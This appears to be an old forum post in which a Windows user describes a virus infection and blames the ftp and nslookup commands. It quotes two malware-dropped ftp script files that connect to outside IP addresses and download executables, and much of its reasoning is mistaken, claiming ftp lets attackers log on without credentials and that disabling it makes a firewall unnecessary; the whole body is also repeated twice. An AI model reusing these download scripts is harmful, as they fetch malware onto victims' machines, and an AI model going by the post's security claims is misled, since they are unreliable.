T
Terry Mester
I have discovered how Spammers are able to access people's Computers to spew
out their Spyware garbage, and it is Microsoft's OS which has made this
possible! Spammers utilize two commands: the "nslookup" Command and the
"ftp" Command found in c:\winnt\system32 -- which you can review in the
Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
Computer while logged onto the Internet to download a Virus. Those E-Mails
you get from friends telling you to forward it on to others, in order to get
good luck or money, are nothing but a SCAM perpetrated by the Spammers!
DELETE those E-Mails -- DO NOT open them!!! Last month after separately
opening two of those E-Mails, I ended up with a Virus on my Computer spewing
out data over the Internet, and also the following two Text Files given the
name "i" under the 'winnt' Directory.
--- \winnt\i
open 136.145.69.79 2755
user 1 1
get kp.exe
quit
--- \winnt\i
open 208.111.5.228 2755
user 1 1
get 2k3.exe
quit
---
The Virus Commands I subsequently found under the 'winnt' or 'system32'
Directories corresponded to the two ".exe" Files named in those two Text
Files. I didn't know where those 4 Command Lines in those "i" Files were
executable until just today when I looked up the "ftp" Command in Help.
Those are 4 sub-commands which caused my Computer to open up the said IP
Address and Port#, log in as the user 1 1, download the Virus Command, and
then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
wrong because this immediately clogged up my Internet Connection. A High
Speed user might not notice anything!
It is unbelievable, but the "ftp" Command enables the Spammer to log onto
your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
not kidding! Further still, the "nslookup" Command enables the Spammer to
find out your IP Numbers and Computer ID so that he can use the "ftp"
Command! It is as if Microsoft specifically designed these two Commands to
help Spammers! As far as I can tell, you cannot disable either of these
Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
"nslookup.exe.rename" in order to make them non-executable, but I don't think
this will solve the problem. Would a Microsoft Corporation technician please
inform us if these two Command functions can be disabled? If not, Microsoft
needs to IMMEDIATELY provide a Service Pack or update to enable these two
functions to be disabled using the "net stop / start" Command. With these
functions disabled, a Firewall Application becomes completely unnecessary!
out their Spyware garbage, and it is Microsoft's OS which has made this
possible! Spammers utilize two commands: the "nslookup" Command and the
"ftp" Command found in c:\winnt\system32 -- which you can review in the
Windows Help Menu. Spammers can also use a HTML E-Mail you open on your
Computer while logged onto the Internet to download a Virus. Those E-Mails
you get from friends telling you to forward it on to others, in order to get
good luck or money, are nothing but a SCAM perpetrated by the Spammers!
DELETE those E-Mails -- DO NOT open them!!! Last month after separately
opening two of those E-Mails, I ended up with a Virus on my Computer spewing
out data over the Internet, and also the following two Text Files given the
name "i" under the 'winnt' Directory.
--- \winnt\i
open 136.145.69.79 2755
user 1 1
get kp.exe
quit
--- \winnt\i
open 208.111.5.228 2755
user 1 1
get 2k3.exe
quit
---
The Virus Commands I subsequently found under the 'winnt' or 'system32'
Directories corresponded to the two ".exe" Files named in those two Text
Files. I didn't know where those 4 Command Lines in those "i" Files were
executable until just today when I looked up the "ftp" Command in Help.
Those are 4 sub-commands which caused my Computer to open up the said IP
Address and Port#, log in as the user 1 1, download the Virus Command, and
then quit "ftp". Since I'm a Dial-up user, I immediately noticed something
wrong because this immediately clogged up my Internet Connection. A High
Speed user might not notice anything!
It is unbelievable, but the "ftp" Command enables the Spammer to log onto
your Computer WITHOUT using an ID and Password! Further, "ftp" enables the
Spammer to prevent you from seeing what it is doing on your Computer!!! I'm
not kidding! Further still, the "nslookup" Command enables the Spammer to
find out your IP Numbers and Computer ID so that he can use the "ftp"
Command! It is as if Microsoft specifically designed these two Commands to
help Spammers! As far as I can tell, you cannot disable either of these
Commands. You can rename "ftp.exe" to "ftp.exe.rename" and "nslookup.exe" to
"nslookup.exe.rename" in order to make them non-executable, but I don't think
this will solve the problem. Would a Microsoft Corporation technician please
inform us if these two Command functions can be disabled? If not, Microsoft
needs to IMMEDIATELY provide a Service Pack or update to enable these two
functions to be disabled using the "net stop / start" Command. With these
functions disabled, a Firewall Application becomes completely unnecessary!